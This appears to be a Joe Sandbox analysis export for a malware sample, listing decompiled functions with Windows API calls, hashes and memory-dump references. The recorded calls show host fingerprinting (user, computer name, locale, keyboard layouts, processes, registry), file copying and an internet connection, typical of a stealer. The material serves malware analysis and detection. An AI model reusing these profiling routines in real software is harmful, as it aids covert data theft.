Opcode Fuzzy Hash: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6BB8C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6BB8C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6BB8C969
GetSystemInfo.KERNEL32(?), ref: 6BB8C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6BB8C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6BB8C9E2

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 1913bd832a513897b61a94942414d620c5b8178e6bde618e4fcae4f10840bb66
Instruction ID: 8f7dce4b3096b45be2fd4383db35bd8fef5c1ac3af8c89315243adb45f9f85fd
Opcode Fuzzy Hash: 1913bd832a513897b61a94942414d620c5b8178e6bde618e4fcae4f10840bb66
Instruction Fuzzy Hash: AC21F972641258ABDB159E78EC84BBE73ADEB46700F50025EF906A7680DB759C00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,042F0988), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,042F26F8,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,042F7480,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,042F2960,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,042F6AF0,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(042F07D8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(042F7200,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(042F07D8,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: db845e602ca4035d7aa081759cb6d4516eb1caf2c095fc66c10f9847325819b9
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: db845e602ca4035d7aa081759cb6d4516eb1caf2c095fc66c10f9847325819b9
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 004065DD, 004065FD, 0040667F
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c1ba8c443553381d6463a35b722fa011d7b81dea12db1d1612586ec36f60eff1
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: c1ba8c443553381d6463a35b722fa011d7b81dea12db1d1612586ec36f60eff1
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,042F2960,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,042F6AF0,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,042F74A0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,042F0998), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,042F74A0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,042F0998), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,042F6940,00000000,?,0041D758,00000000,?,00000000,00000000,?,042F74E0,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,042F6940,00000000,?,0041D758,00000000,?,00000000,00000000,?,042F74E0,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,042F7500,00000000,?,0041D76C,00000000,?,00000000,00000000,?,042F6A00,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,042F26F8,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,042F7480,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,042F6AA8,00000000,?,0041D774,00000000,?,00000000,00000000,?,042F6A78), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,042F3428,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042F0A68), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: b8138d2cb021ad855c2c91f6e9635b1f270f0d4578551072dfb7634207718208
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: b8138d2cb021ad855c2c91f6e9635b1f270f0d4578551072dfb7634207718208
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: b32dbd48fef6c991f24393565f536ea1b201fd5407d7c8f9d1c6b670b0949385
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

